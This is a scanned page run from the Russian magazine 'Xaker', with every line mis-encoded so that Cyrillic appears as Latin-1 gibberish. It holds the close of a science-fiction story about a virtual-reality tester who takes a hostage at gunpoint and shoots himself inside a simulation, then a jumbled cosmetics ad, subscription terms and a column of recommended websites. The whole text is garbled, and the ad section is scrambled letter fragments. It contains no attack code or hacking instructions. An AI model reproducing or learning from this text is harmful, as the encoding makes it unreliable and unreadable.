«âñÿêî-ðàçíî äåâàõó», òàêñèñò íà íåêîòîðîå âðåìÿ çàìîë÷àë… è ïðèíÿëñÿ ñëîâî â ñëîâî ïåðåñêàçûâàòü óæå ðàññêàçàííóþ äîðîæíóþ èñòîðèþ. Òàê æå óâëå÷åííî, êàê â ïåðâûé ðàç. Êîãäà èñòîðèÿ ïðî ñïîð íà «Êëèíñêîå» ñòàðòîâàëà â òðåòèé ðàç, â ìàëåéøèõ ïîäðîáíîñòÿõ ïîâòîðÿÿ ïðåäûäóùèå, Àíäðåé ïðåðâàë åãî: — Âû èçäåâàåòåñü íàäî ìíîé? Òàêñèñò, íå îáðàùàÿ íà íåãî íèêàêîãî âíèìàíèÿ, ïðîäîëæàë ãîâîðèòü. Íà ïîïûòêè Àíäðåÿ âìåøàòüñÿ è îáúÿñíèòü, ÷òî îí óæå ñëûøàë âñå ýòî, îí íèêàê íå ðåàãèðîâàë è, ñëîâíî æèâîé ìàãíèòîôîí, ïðîäîëæàë òðàíñëèðîâàòü çàïèñü. Äà è âñå åãî ðàññêàçû ïåðåäàâàëèñü ñ àáñîëþòíî îäèíàêîâîé èíòîíàöèåé. Àíäðåé ïðîåõàë ìîë÷à âñþ äîðîãó äî íàçâàííîãî àäðåñà è ïîä êîíåö óæå áûë ãîòîâ ñîéòè ñ óìà. Íàêîíåö-òî ìàøèíà îñòàíîâèëàñü, è âïåðâûå çà 40 ñ ëèøíèì ìèíóò æèâîé ðîáîò ïðåðâàë ñâîþ çàïèñü, ÷òîáû ñêàçàòü: — Ñ÷àñòëèâîé äîðîãè. Àíäðåé êèâíóë, çàõëîïíóë äâåðü è, ïðîâîäèâ âçãëÿäîì ñòðàííîå òàêñè, ïîøåë äàëüøå.

*** Îí ñíîâà íàõîäèëñÿ â îäíîì èç ñòàðûõ ìîñêîâñêèõ äâîðèêîâ, ãäå çà êðîíàìè äåðåâüåâ âèäíåëèñü î÷åðòàíèÿ çäàíèÿ «ÂÐ Èíñàéä». Àíäðåé ïðèåõàë ðàñïðàâèòüñÿ ñ âðàãîì, íî ñ ÷åãî íà÷àòü — íå ïðåäñòàâëÿë. Îëåã Íèêîëàåâè÷ íàõîäèëñÿ âíóòðè, Àíäðåé ýòî ÷óâñòâîâàë, à òàêæå êó÷à ñîòðóäíèêîâ è îõðàíà. Íî ñòîÿòü íà ìåñòå, ïðèåõàâ ñþäà, áûëî ãëóïî. Îí îñòîðîæíî ïîäîøåë ê çäàíèþ.  ñòåêëÿííîé áóäêå ñòîÿë òîò æå îõðàííèê. ×åðåç ìèíóòó èç äâåðè âûøëî äâîå ñîòðóäíèêîâ êîìïàíèè è íàïðàâèëèñü ê ñâîèì ìàøèíàì íà ðàñïîëîæåííîé âî äâîðå ïàðêîâêå. Ñîëíöå óæå ïî÷òè ñåëî, ðàáî÷èé äåíü ïîäîøåë ê êîíöó è âñå, ïîõîæå, ðàçúåçæàëèñü. Ñòîÿíêà äëÿ ìàøèí îõðàíÿëàñü, íî êàìåðà è áóäêà îõðàííèêà áûëè ðàñïîëîæåíû íå ñîâñåì óäîáíî äëÿ ïðîñìîòðà, òàê ÷òî ïðè æåëàíèè ìîæíî áûëî íåçàìåòíî ïðîêðàñòüñÿ. Åñëè áû îí òîëüêî çíàë, êàêàÿ èç ýòèõ ìàøèí Îëåãà Íèêîëàåâè÷à. Âíåçàïíàÿ ìûñëü çàñòàâèëà Àíäðåÿ çàñóíóòü ðóêó â êàðìàí. Îí âûòàùèë êëþ÷ è åùå ðàç ïîñìîòðåë íà ïàðêîâî÷íóþ ïîëîñó. Ñðåäè ìàøèí áûëà Honda Accord — òî÷íî òàêîé æå ìîäåëè, êàêàÿ çíà÷èëàñü íà áðåëêå. Êîíå÷íî, äóìàòü î òîì, ÷òî êëþ÷ ïîäîéäåò, áûëî îòêðîâåííî ãëóïî, íî çà ïîñëåäíèå 2 äíÿ ñëó÷àëîñü ìíîãî íåâåðîÿòíûõ âåùåé. Ïðèãíóâøèñü è ïðîáåæàâ âäîëü çàáîðà, Àíäðåé þðêíóë â ðÿä ìàøèí è ïîäîáðàëñÿ ê Õîíäå. Âñòàâèë â íåå êëþ÷, ïðîâåðíóë, è äâåðü îòêðûëàñü. — È ìíå åùå áàíî÷êó «Êîëû», åñëè ìîæíî, — ïîñìîòðåâ íà íåáî ïîïðîñèë Àíäðåé. Çàáðàâøèñü â ñàëîí è çàêðûâ äâåðü, îí îñìîòðåëñÿ. È ïåðâûì, ÷òî óâèäåë, áûëà îñòàâëåííàÿ íà çàäíåì ñèäåíüå 0,25-ëèòðîâàÿ áàíêà Cola Light.

*** Ìàøèíû íà ñòîÿíêå áûñòðî ðåäåëè. Ñïðÿòàâøèñü íà çàäíåì ñèäåíüå, Àíäðåé íàáëþäàë ÷åðåç çàòåìíåííîå îêíî, êàê îäèí çà äðóãèì ðàáîòíèêè ÂÐÈ âûõîäÿò èç çäàíèÿ è ðàçúåçæàþòñÿ.  êîíöå êîíöîâ íà ñòîÿíêå îñòàëàñü òîëüêî Õîíäà, â êîòîðîé îí ñèäåë. Íà óëèöå óæå ñîâñåì ñòåìíåëî, âî äâîðèêå çäàíèÿ ôèðìû çàæãëèñü îãíè. Íàêîíåö ïîêàçàëñÿ òîò, êîãî îí æäàë. Îëåã Íèêîëàåâè÷ åùå ìèíóòû äâå î ÷åì-òî ðàçãîâàðèâàë ñ îõðàííèêîì, ïîòîì êèâíóë åìó íà ïðîùàíüå è íàïðàâèëñÿ ê ìàøèíå. Àíäðåé íûðíóë ïîä ñèäåíüå è çàòàèë äûõàíèå.

XÀÊÅÐ 01 /85/ 06


Âðàã îòêðûë äâåðü, ñåë çà ðóëü è çàâåë äâèãàòåëü. Àíäðåé äàë åìó âûåõàòü ñ òåððèòîðèè ôèðìû è òîëüêî ïîòîì ðåçêèì äâèæåíèåì ïðèñòàâèë äóëî ê øåå âîäèòåëÿ. — Ïðèâåò, íå æäàë? Ñâåðíè çäåñü, — ñêàçàë îí. Îëåã Íèêîëàåâè÷ ïîâèíîâàëñÿ. — Òû æå íå áóäåøü ñòðåëÿòü? — Åùå êàê áóäó. Äàé òîëüêî ïîâîä, — Àíäðåé ñ ãîðäîñòüþ îùóòèë ñòàëüíûå íîòêè â ñâîåì ãîëîñå. — Ó òåáÿ åùå âñÿ æèçíü âïåðåäè. Íå ðàçðóøàé âñå ñâîèìè æå ðóêàìè. — Ýòî òû ðàçðóøàåøü ìîþ æèçíü. Íàâåðíîå, äóìàë, ÷òî âñå îñòàíåòñÿ áåçíàêàçàííûì? — Î ÷åì òû ãîâîðèøü? — Ñþäà ïîâîðà÷èâàé. Òàì çàáðîøåííàÿ ñòðîéêà, åçæàé ê íåé. Ñòðîéêó Àíäðåé óñïåë çàìåòèòü, êîãäà åõàë ñþäà ñ ðîáîòîì-òàêñèñòîì. Ìàøèíà îñòàíîâèëàñü ðÿäîì ñ íåäîñòðîåííûì çäàíèåì, Àíäðåé òêíóë âîäèòåëÿ äóëîì ïèñòîëåòà. — Âûõîäè. È áåç ãëóïîñòåé, ìíå óæå òåðÿòü íå÷åãî, ïðèñòðåëþ áåç âîïðîñîâ. Âðàã âûøåë èç ìàøèíû. Ýòî ìåñòî áûëî àáñîëþòíî áåçëþäíûì è òèõèì. Îíè ñòîÿëè ïîä òóñêëûì ñâåòîì ôîíàðÿ. — À òåïåðü ðàññêàçûâàé. Âñå ïî ïîðÿäêó. È íà÷íè ñ òîãî, ïî÷åìó âû ïûòàåòåñü ìåíÿ óáèòü? Îëåã Íèêîëàåâè÷ âûòÿíóë ëèöî â èçóìëåííîé ãðèìàñå. — Ýòî êàêîå-òî íåëåïîå íåäîðàçóìåíèå. Çà÷åì íàì òåáÿ óáèâàòü? Ìû, êàê è òû, õîòåëè óçíàòü ïðàâäó. Î òâîèõ ôàíòàñòè÷åñêèõ ñïîñîáíîñòÿõ. Òâîé ïîáåã òîëüêî âñå óñëîæíèë. À ïîòîì èñ÷åçíîâåíèå èç áîëüíèöû Ãåîðãèÿ… — Âû åùå ñêàæèòå, ÷òî â ýòîì íè ïðè ÷åì. — Ýòî ïðàâäà! — È î ïîäîñëàííîì çåêå, ïûòàâøåìñÿ óòîïèòü ìåíÿ â êàíàëå, âû òîæå íå çíàåòå? — Íåò! — È î âçðûâå ìîåé êâàðòèðû ïîñðåäè áåëà äíÿ? — ß ñëûøàë îá ýòîì, íî êëÿíóñü, ÂÐÈ íå èìååò ê ýòîìó íèêàêîãî îòíîøåíèÿ. Íàîáîðîò, ìû ïûòàëèñü òåáÿ íàéòè, ÷òîáû çàùèòèòü. — Íå âåðü åìó! Àíäðåé íå ïîâåðèë ñâîèì óøàì. Îí ðåçêî ïîâåðíóëñÿ è óâèäåë âûõîäÿùåãî íà ñâåò ôîíàðÿ Æîðèêà. Âñå åãî òåëî áûëî ïîêðûòî øðàìàìè îò îæîãîâ. — Ýòî, — ïîêàçàë îí íà ñâîå ëèöî, — îíè ñäåëàëè ñî ìíîé. È òû ñëåäóþùèé. — Ëîæü! — çàêðè÷àë Îëåã Íèêîëàåâè÷. — Òû çíàë, ÷òî ïîäîáíîå ìîãëî êîãäà-íèáóäü ñëó÷èòüñÿ. ß ïðåäóïðåæäàë òåáÿ, íå çàðûâàéñÿ. — Òû, ñóìàñøåäøèé. Âñå, ÷òî òåáå íóæíî áûëî, — åãî äàð. Íà íåãî ñàìîãî, êàê è íà ìåíÿ, òåáå ïëåâàòü. Àíäðåé ñòîÿë â ñòîðîíå, íå ïîíèìàÿ, ÷òî ïðîèñõîäèò. — Òû õîòåë çíàòü, ÷òî ñëó÷èëîñü? — ñïðîñèë Æîðà. — Òåñòåðû, êîòîðûå òùàòåëüíî îòáèðàëèñü äëÿ ïðîåêòà Ìåçà — íå ñîâñåì îáû÷íûå ëþäè. Ó êàæäîãî èç íèõ åñòü îñîáûé, íåðåàëèçîâàííûé äàð, íî èìåþùèé áîëüøîé ïîòåíöèàë. Ñïîñîáíîñòü âëèÿòü íà îêðóæàþùèé ìèð, ëþäåé. Ïðè÷èíà âñåãî, ÷òî ñ òîáîé ïðîèñõîäèò, ëåæèò â òåáå ñàìîì.. ß íå çíàþ, êàê èìåííî òû ýòî äåëàåøü, íî ÂÐÈ áûëà îñíîâàíà äëÿ èçó÷åíèÿ òàêèõ ñïîñîáíîñòåé. À Ìåçà — äëÿ èõ òðåíèðîâêè. Ñ÷èòàëîñü, ÷òî áåçîïàñíåå íàáëþäàòü çà ïðîÿâëåíèÿìè òâîåãî äàðà â èíòåðàêòèâíîì ñèìóëÿòîðå, íî îêàçàëîñü, ÷òî äàæå èç Ìåçû òû ìîæåøü âëèÿòü íà ðåàëëàéô.

XÀÊÅÐ 01 /85/ 06

— À ïî÷åìó òîãäà ðàíüøå ñî ìíîé íå ïðîèñõîäèëî íè÷åãî ïîäîáíîãî? — Ïðîèñõîäèëî, íî âñÿêèé ðàç òû íàõîäèë ýòîìó îáúÿñíåíèå. ÂÐÈ ñòàðàåòñÿ âñÿ÷åñêè ñêðûâàòü òî, ÷åì çàíèìàåòñÿ. È òû ïîñòàâèë èõ èññëåäîâàíèÿ ïîä óãðîçó. — Ãîñïîäè, êàêàÿ ÷óøü, — ïðåðâàë Æîðó Îëåã Íèêîëàåâè÷. — Àíäðåé, íåóæåëè òû äåéñòâèòåëüíî âåðèøü, ÷òî òû êàêîé-òî ñâåðõ÷åëîâåê, ñóïåðìåí? Âíåçàïíî ðàçäàëñÿ âîé ñèðåíû, è çàáðîøåííàÿ ñòðîéêà îñâåòèëàñü îãíÿìè ôàð ìèëèöåéñêèõ ìàøèí.  âîçäóõå ïîÿâèëñÿ âåðòîëåò, è ãðîìêèé ãîëîñ â ðóïîð îáúÿâèë: —Áðîñàé îðóæèå, ðàéîí îöåïëåí. Àíäðåé óâèäåë, êàê ìèíèìóì, 30 ëþäåé â ôîðìå è ìàñêàõ, êîòîðûå íàïðàâèëè íà íåãî àâòîìàòû. — ÂÐÈ è ê ýòîìó îòíîøåíèÿ íå èìååò? — íå îïóñêàÿ ïèñòîëåòà, ñïðîñèë îí. Îëåã Íèêîëàåâè÷ ïîæàë ïëå÷àìè. Íà åãî ôóòáîëêå âåñåëî ïðûãàëè äåñÿòêè êðàñíûõ òî÷åê, â ëþáóþ ñåêóíäó ãîòîâûå ïðåâðàòèòüñÿ â ðâàíûå ðàíû íà òåëå. Àíäðåé áóêâàëüíî ôèçè÷åñêè îùóòèë, êàê â íåãî âïèâàþòñÿ î÷åðåäè ïóëü, ïðåäñòàâèë, êàê ñ ïîñëåäíèì âçäîõîì ïàäàåò íà çåìëþ… — Äðóæèùå, ïîëîæè ïèñòîëåò, ïîñëóøàé èõ. Ìû çíàåì, ÷òî òû íè â ÷åì íå âèíîâàò, ïîâåðü, âñå îáðàçóåòñÿ, — Æîðà ïûòàëñÿ ãîâîðèòü ñïîêîéíî. — Îí ïðàâ. Íå äåëàé ãëóïîñòåé, — çàêèâàë Îëåã Íèêîëàåâè÷. Âñå ýòî áûëî, êàê äóðíîé ñîí. Àíäðåé óñòàëî îãëÿíóëñÿ íà âñåõ ýòèõ ëþäåé, êîòîðûå ïðèåõàëè çà íèì. È óâèäåë ïîçàäè ìèëèöåéñêèõ ìàøèí ðåêëàìíûé ùèò, íà êîòîðîì â ñâåòå îãíåé âûñòóïàëà ÿðêàÿ íàäïèñü: «Ìåçà: ìèð, êîòîðûé ñòðîèøü òû ñàì».  ãîëîâå âñïûøêîé ïðîíåñëèñü îáðàçû, ïðåñëåäîâàâøèå åãî ïîñëåäíèå äâà äíÿ: ðàáîòíèêè ÂÐÈ, ïðîäàâùèöà, Îëåã Íèêîëàåâè÷, ñòðàííàÿ äåâî÷êà Êðèñòè, ìåäñåñòðà â áîëüíèöå, çåê ñ òàòóèðîâêîé, ïîæèëàÿ ïàðà, ïàðåíü ñ ìîáèëüíèêîì, ðîáîò-âîäèòåëü è Æîðà. —Ìèð, êîòîðûé ñòðîèøü òû ñàì, — òèõî ïðîøåïòàë Àíäðåé. Ïîñëå ýòîãî ïðèñòàâèë äóëî ê ñâîåìó âèñêó è íàæàë íà êóðîê…

*** — Àíäðþõà, ïðèâåò, ãäå ïðîïàäàë? ß òåáå çâîíèë… Êàê òâîå òåñòèðîâàíèå? Àíäåé áûë ðàä ñíîâà âèäåòü Æîðêó â àñüêå. Ïðîøëî äâå íåäåëè ñ òåõ ïîð, êàê îíè îáùàëèñü â Ñåòè ïîñëåäíèé ðàç. Àíäðåé ïðàêòè÷åñêè íå áûâàë â ðåàëüíîé æèçíè, ïðîâîäÿ âñå ñâîå âðåìÿ â Ìåçå. Ðàáîòíèêè ÂÐÈ âûïîëíèëè ñâîå îáåùàíèå: ìèð, äâåðü â êîòîðûé îíè îòêðûëè, áûë äåéñòâèòåëüíî ïîòðÿñàþùèì ïî ðåàëèñòè÷íîñòè. Ìîçã íå ìîã îòëè÷èòü, ãäå çàêàí÷èâàåòñÿ ðåàëüíîñòü, à ãäå íà÷èíàþòñÿ òâîè ôàíòàçèè. Îí âñïîìíèë ñâîå ïåðâîå âîçâðàùåíèå èç Ìåçû. Âûñòðåë, òüìà, ëàáîðàòîðèÿ ÂÐÈ, ãäå ïåðâûì, ÷òî îí óñëûøàë, áûë áîäðûé ãîëîñ Îëåãà Íèêîëàåâè÷à: «Ñ âîçâðàùåíèåì!». Äóì, êâåéê è äàæå ñàìûå ðåâîëþöèîííûå îíëàéíîâûå RPG — âñå ýòî â ñêîðîì âðåìåíè óéäåò â ïðîøëîå, ïîòîìó ÷òî íèêîãäà íå äàñò ïîëíîãî îùóùåíèÿ ïîãðóæåíèÿ. Êòî áû ìîã ïîäóìàòü, ÷òî îäíà åäèíñòâåííàÿ ïèëþëÿ, ðàñòâîðèâøàÿñÿ â ñòàêàíå âîäû, ñìîæåò çàìåíèòü ìèëëèîíû áèò íà DVD? Àíäðåé ïîìíèë, ÷òî êîãäà íà ôóðøåòå ïèë ïðåäëîæåííûé ñîê, îí îùóòèë ñòðàííûé ïðèâêóñ â íåì, íî òîãäà íå ïðèäàë ýòîìó çíà÷åíèÿ. À âåäü èìåííî ñ òîãî ñàìîãî ãëîòêà íà÷àëîñü åãî ïîãðóæåíèå â Ìåçó. Ó «ÂÐ Èíñàéä» óøëî 5 ëåò, ÷òîáû ðàçðàáîòàòü ôîðìóëó, ïîðàçèòåëüíûì îáðàçîì ñòèìóëèðóþùóþ ÷åëîâå÷åñêîå âîîáðàæåíèå. Êîíå÷íî, ìíîãèå áóäóò ñðàâíèâàòü Ìåçó ñ ÿðêèì ñíîì. Íî ëèøü äî òåõ ïîð, ïîêà íå ïîïàäóò â ýòîò ìèð ñàìè è íå ïî÷óâñòâóþò ðàçíèöó. «Ìèð, êîòîðûé òû ñòðîèøü ñàì» — âñå îêàçàëîñü èìåííî òàê, òîëüêî äàæå òû ñàì íå çíàåøü, êàêîå ïðèêëþ÷åíèå òåáå óãîòîâèò âîîáðàæåíèå â ñëåäóþùèé ðàç. Íåêîòîðûå òåñòåðû ïåðåæèëè â Ìåçå íàñòîÿùèå êîøìàðû, äðóãèå èñïûòàëè ýìîöèè, êîòîðûõ æäàëè âñþ æèçíü. Ó Àíäðåÿ áûëî è òî, è äðóãîå. È ýòî òîëüêî íà÷àëî. — Èäåò ïîëíûì õîäîì, — îòâåòèë îí äðóãó. — Ïðèøåë âîò çà íåêîòîðûìè âåùàìè. Íå çíàþ, ñêîëüêî åùå ïðîäëèòñÿ òåñòèðîâàíèå. Êàê òîëüêî âñå çàêîí÷èòñÿ, âñòðåòèìñÿ, âñå ðàññêàæó. — Òâîè îæèäàíèÿ îïðàâäàëèñü? — Áîëåå ÷åì. Îí âûêëþ÷èë êîìïüþòåð, çàêèíóë íà ïëå÷î ñóìêó è âûøåë çà äâåðü. Óëèöà âñòðåòèëà åãî òåïëûì ëåòíèì ñîëíöåì. Ìîñêâà æèëà ñâîåé ïðèâû÷íîé áóðíîé æèçíüþ, ëþäè ñïåøèëè ïî äåëàì, ìàøèíû ïðîíîñèëèñü îäíà çà äðóãîé. Íèêòî íå çíàë, ÷òî î÷åíü ñêîðî ãðÿäåò âðåìÿ ïåðåìåí. BINARY YOUR’S z

135


åç æà á ààÿ êî åñïå÷èâ ÿ ò ñ è á ÷ ÿ î í n ÿ e æ à M òü il for äëÿ áðè òüå, óâë çèðóþaras ü è ðè Ñ Cle åì! Ãåë àäêîå á ìè. Òîí , íî ë î à ë ïðîá ãêîå è ã âèòàìèí ÿ ãëóáîê ãðÿçíåÿ à è ó ç ì í à æ ò ò â î àêò î å óìû èöà êñòð òàÿ ê è ïè ãåëü äëÿ ò êîæó ë íòîë è ý ðóþò è å ùèé î÷èùàå þùèé ì ü, òîíèçè for Men î ìÿãê à îñâåæà áîäðîñò Clearasil îëîäûì íèé, ïðèäàþò ó. Ñåðèÿ çâîëèò ì ðîøî è àëîý àþò êîæ îæåé ïî ÿäåòü õî ê ÷ ë ñìÿã õîäà çà ãäà âûã ì. å ó äëÿ èíàì âñ óæàþùè ð ÷ ìóæ òüñÿ îê è íðàâ

Π×ÈÊ Ñ È Ï ÏÎÄ 0 5 Ê. ÀÐÎ ÂÛÅ Ä Ð Å Î Ï Ï ÃÅËÜ É ×ÀÒ È Ó Ë ÞÙ ÏÎ ÈÐÓ Ç È Èß ÒÎÍ ÂÀÍ ß Û Ì ÈÒÜ Ó Ð ß Á Ë Ä Ëß N ËÜ Ä FOR ME Å Ã È SIL ARA E L C

ÇÀÊÀÇ ÆÓÐÍÀËÀ Â ÐÅÄÀÊÖÈÈ

«Õàêåð»+2 CD 115ð

ÇÀ ÍÎÌÅÐ

690ð

ÇÀ 6 ÌÅÑßÖÅÂ

ÒÅ È Ø Å Ï Ñ

ÀÆÈ ÇÀÊÐÍÀË ÆÓ ÀÊÖÈÈ Ü Ä Â ÐÅ ÊÎÍÎÌ! È ÑÝÅÍÜÃÈ!! Ä

(ýêîíîìèÿ 30ðóá.*) (ýêîíîìèÿ 180 ðóá.*)

1242ð ÇÀ 12 ÌÅÑßÖÅÂ (ýêîíîìèÿ 460ðóá.*)

«Õàêåð»+DVD

«Õàêåð»+«Õàêåð Cïåö »

130ð

ÇÀ ÍÎÌÅÐ

207ð

780ð

ÇÀ 6 ÌÅÑßÖÅÂ

1242ð ÇÀ 6 ÌÅÑßÖÅÂ

(ýêîíîìèÿ 30ðóá.*) (ýêîíîìèÿ 180 ðóá.*)

1404ð ÇÀ 12 ÌÅÑßÖÅÂ (ýêîíîìèÿ 516 ðóá.*)

ÇÀ ÍÎÌÅÐ

(ýêîíîìèÿ 85ðóá.*) (ýêîíîìèÿ 510 ðóá.*)

2236ð ÇÀ 12 ÌÅÑßÖÅÂ

(ýêîíîìèÿ 1250 ðóá.*)


Êàê îôîðìèòü çàêàç? 1 2 3

Çàïîëíèòü êóïîí è êâèòàíöèþ Ïåðå÷èñëèòü ñòîèìîñòü ïîäïèñêè ÷åðåç Ñáåðáàíê Îáÿçàòåëüíî ïðèñëàòü â ðåäàêöèþ êîïèþ îïëà÷åííîé êâèòàíöèè ñ ÷åòêî çàïîëíåííûì êóïîíîì ëþáûì èç ïåðå÷èñëåííûõ ñïîñîáîâ: ïî ýëåêòðîííîé ïî÷òå: subscribe@glc.ru; ïî ôàêñó: +7 (095) 780-88-24 ïî àäðåñó: 119992, Ìîñêâà, óë. Òèìóðà Ôðóíçå, äîì 11, ñòð. 44-45, «Ãåéì Ëýíä», îòäåë ïîäïèñêè.

Ïîäïèñêà äëÿ þðèäè÷åñêèõ ëèö Ìîñêâà: ÎÎÎ "Èíòåð-Ïî÷òà", òåë.: 500-00-60, e-mail: inter-post@sovintel.ru Ðåãèîíû: ÎÎÎ "Êîðïîðàòèâíàÿ ïî÷òà", òåë.: 953-92-02, å-mail: kpp@sovintel.ru Äëÿ ïîëó÷åíèÿ ñ÷åòà íà îïëàòó ïîäïèñêè íóæíî ïðèñëàòü çàÿâêó ñ íàçâàíèåì æóðíàëà, ïåðèîäîì ïîäïèñêè, áàíêîâñêèìè ðåêâèçèòàìè, þðèäè÷åñêèì è ïî÷òîâûì àäðåñîì, òåëåôîíîì è ôàìèëèåé îòâåòñòâåííîãî ëèöà çà ïîäïèñêó. www.interpochta.ru

ÂÍÈÌÀÍÈÅ! ïîäïèñêà îôîðìëÿåòñÿ â äåíü îáðàáîòêè êóïîíà è êâèòàíöèè. êóïîíû, îòïðàâëåííûå ïî ôàêñó èëè ýëåêòðîííîé ïî÷òå, îáðàáàòûâàþòñÿ â òå÷åíèå 5 ðàáî÷èõ äíåé. êóïîíû, îòïðàâëåííûå ïî÷òîé íà àäðåñ ðåäàêöèè îáðàáàòûâàþòñÿ â òå÷åíèå 20 äíåé. ÐÅÊÎÌÅÍÄÓÅÌ ÈÑÏÎËÜÇÎÂÀÒÜ ÝËÅÊÒÐÎÍÍÓÞ ÏÎ÷ÒÓ ÈËÈ ÔÀÊÑ.

Ïîäïèñêà ïðîèçâîäèòñÿ ñ íîìåðà, âûõîäÿùåãî ÷åðåç îäèí êàëåíäàðíûé ìåñÿö ïîñëå îïëàòû. Íàïðèìåð, åñëè ïðîèçâåñòè îïëàòó â ñåíòÿáðå, òî ïîäïèñêó ìîæåíî îôîðìèòü ñ íîÿáðÿ. ÏÎ ÂÑÅÌ ÂÎÏÐÎÑÀÌ ÏÎ ÏÎÄÏÈÑÊÅ ÇÂÎÍÈ ÁÅÑÏËÀÒÍÎ ÏÎ ÒÅËÅÔÎÍÓ 8-8 8 00-2 2 00-3 3 -9 9 99 ( ÒÎÌ ×ÈÑËÅ Ñ ÌÎÁÈËÜÍÛÕ ÒÅËÅÔÎÍΠÑÅÒÅÉ ÌÒÑ, ÁÈËÀÉÍ, ÌÅÃÀÔÎÍ). ÂÎÏÐÎÑÛ ÏÎ ÏÎÄÏÈÑÊÅ ÌÎÆÍÎ ÇÀÄÀÂÀÒÜ ÏÎ E-M MAIL: INFO@GLC.RU * ÝÊÎÍÎÌÈß ÎÒ ÑÐÅÄÍÅÉ ÐÎÇÍÈ×ÍÎÉ ÖÅÍÛ ÏÎ ÌÎÑÊÂÅ

ÏÎÄÏÈÑÍÎÉ ÊÓÏÎÍ

Ïðîøó îôîðìèòü ïîäïèñêó:


ÞÍÈÒÛ ///// ISSUE

www _units ÈÂÀÍ ÑÊËßÐΠwww.sklyaroff.ru ÈÂÀÍ ÊÓÇÍÅÖΠAKA SEED seed@nsk.ru

Èäåàëüíàÿ Òâîð÷åñêàÿ Ñðåäà Synergy 1 www.synergy.com.ua

Ó òåáÿ åñòü èíòåðåñíàÿ èäåÿ, íî íåò âîçìîæíîñòè åå ðåàëèçîâàòü? Íå ïðîáëåìà — âñòóïàé â ïðîåêò Synergy. Synergy (îò ãðå÷. «ñîòðóäíè÷åñòâî») — ýòî ìåæäóíàðîäíàÿ íåêîììåð÷åñêàÿ îðãàíèçàöèÿ. Îñíîâíàÿ öåëü êîòîðîé — ñîáðàòü êðåàòèâíûõ ëþäåé, èìåþùèõ îðèãèíàëüíûå èäåè è ãîòîâûõ äëÿ èõ âîïëîùåíèÿ áåñêîðûñòíî ïîìî÷ü äðóãèì òàêèì æå ãåíèÿì.  ïðîåêò ïðèíèìàþòñÿ èäåè íå òîëüêî ïðîãðàììåðñêîãî òîëêà, íî è, ê ïðèìåðó, ôèëîñîôñêèå èëè èäåè ïî îïòèìàëüíîìó óïðàâëåíèþ ïåðñîíàëîì.  äàííûé ìîìåíò îñíîâíûå óñèëèÿ íàïðàâëåíû íà íàïèñàíèå ÿäðà OS Synergy.

2

Êåðíåë äëÿ ñàìûõ ìàëåíüêèõ www.kernelnewbies.org Ýòîò ïðîåêò ïîëíîñòüþ îðèåíòèðîâàí íà íà÷èíàþùèõ ðàçðàáîò÷èêîâ ÿäðà. Íà ñàéòå ðàññìàòðèâàåòñÿ â îñíîâíîì ÿäðî Linux, íî èìåþòñÿ ñâåäåíèÿ è ïî ÿäðàì äðóãèõ *nix-ñèñòåì. Íàâåðíîå, íå ñòîèò ãîâîðèòü, ÷òî çäåñü ñîáðàíà âñåâîçìîæíàÿ èíôîðìàöèÿ íà÷àëüíîãî õàðàêòåðà, äîêóìåíòàöèÿ è ìàíóàëû, ðàçíîãî ðîäà FAQ, ðåêîìåíäóåìûå êíèãè, ññûëêè. Èìååòñÿ äàæå ñâîé êàíàë IRC. Íî âñÿ èíôîðìàöèÿ íà àíãëèéñêîì, õîòÿ åñòü óæå âåðñèè ñàéòà íà èñïàíñêîì è áðàçèëüñêîì ÿçûêàõ. Ìîæåò áûòü, íàéäóòñÿ ðóññêèå õëîïöû, êîòîðûå ñäåëàþò ðóññêèé âàðèàíò?

1

3

Ýìóëÿòîðû ïðîøëîãî www.uic.nnov.ru/~pyva

3

Ýòîò ñàéò çàñòàâèë ìîå ñåðäöå áèòüñÿ ÷àùå, è äàæå ñêóïàÿ ìóæñêàÿ ñëåçà ñêàòèëàñü ïî ìîåé ùåêå îò íîñòàëüãèè. Çäåñü ÿ íàøåë ýìóëÿòîð ñâîåãî ïåðâîãî â æèçíè êîìïüþòåðà - ÏÊ «Ìèêðîøà» ñ àðõèâîì èãðîâûõ ïðîãðàìì. Òàì æå ÿ íàøåë ññûëêó íà ýìóëÿòîð ñâîåãî âòîðîãî êîìïüþòåðà - ÏÊ «Êîðâåò». Âåñü âå÷åð ÿ èãðàë â Ðàëëè, Ñîêîáàí, Êëàä, Àðêàíîèä è ïðî÷èå ïðèìèòèâíûå èãðóøêè. Óâåðåí, åñëè òåáå ñåé÷àñ íå 15 ëåò, òî òû òîæå íàéäåøü ýìóëÿòîð ñâîåãî ïåðâîãî êîìïüþòåðà. Åñòü èíôîðìàöèÿ è äëÿ ðàçðàáîò÷èêîâ ýìóëÿòîðîâ.

Âñå î ïðîãðàììèðîâàíèè æåëåçà è ìèêðîêîíòðîëëåðîâ http://yusoft.kulichki.com Èçâåñòíî, ÷òî ìåæäóíàðîäíàÿ ðàçðàáîòêà ñèñòåìû Linux íà÷àëàñü ñ ïðèçûâà Ëèíóñà Òîðâàäüäñà â ýëåêòðîííîé êîíôåðåíöèè: «Âû ñêîðáèòå î òåõ âðåìåíàõ, êîãäà ìóæ÷èíû áûëè íàñòîÿùèìè ìóæ÷èíàìè è ñàìè ïèñàëè äðàéâåðà óñòðîéñòâ?». Äàííûé ñàéò ñîçäàí äëÿ íàñòîÿùèõ ìóæ÷èí, êîòîðûå ñàìîñòîÿòåëüíî ïðîãðàììèðóþò æåëåçî è ìèêðîêîíòðîëëåðû. Âïðî÷åì, ïðîåêò íå îãðàíè÷èâàåòñÿ îäíèìè ÏÈÊàìè, åñòü ìíîãî èíôîðìàöèè íà îêîëîêîìïüþòåðíûå òåìû. Ñàéò ñîçäàí îäíèì ÷åëîâåêîì - Þðèåì Ëûñåíêîâûì è, ê ñîæàëåíèþ, äàâíî óæå íå îáíîâëÿëñÿ.

2

4


Áàðñèê 5

www.niif.spbu.ru/~monakhov/www/applicat_r.html

